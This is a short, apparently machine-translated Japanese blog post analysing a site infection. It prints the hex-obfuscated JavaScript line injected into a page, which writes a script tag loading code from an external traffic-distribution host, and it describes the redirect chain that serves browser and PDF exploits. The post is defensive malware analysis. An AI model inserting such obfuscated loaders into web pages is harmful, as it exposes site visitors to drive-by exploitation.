不運なファイルの最後の行を見てください:
var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);
このセクションを完了すると、別のスクリプトがページに追加されますが、外部リンクを使用します。
いくつかのリダイレクトの後、1つまたは別の関連する脆弱性を使用して、ブラウザに適切なエクスプロイトJSコードをスローします。 たとえば、Windows版Operaでは、Adobe ReaderのPDFビューアーとブラウザーの統合は無効になっていますが、悪意のあるPDFファイルが自然に開きます。
コードを詳しく調べたい人のために、 サンプルのJSコードとサンプルのPDFドキュメントを紹介します 。 Kaspersky Anti-Virusは、結果のPDFをExploit.Win32.Pidief.cykとして検出します。 残りのウイルス対策製品はほとんど完全にサイレントです-VirusTotalレポート 。
DomainToolsとWebHosting.infoによると、おそらく同様の目的で、さらにいくつかのドメインがこのホスト(もちろん中国にあります)にバインドされています。
PSところで、 thetraf.net / tds / adminには、 Sutra TDS管理パネル ( TDS-トラフィック配信システム-トラフィック配信システム)へのパスワードで保護された入り口があります。 :)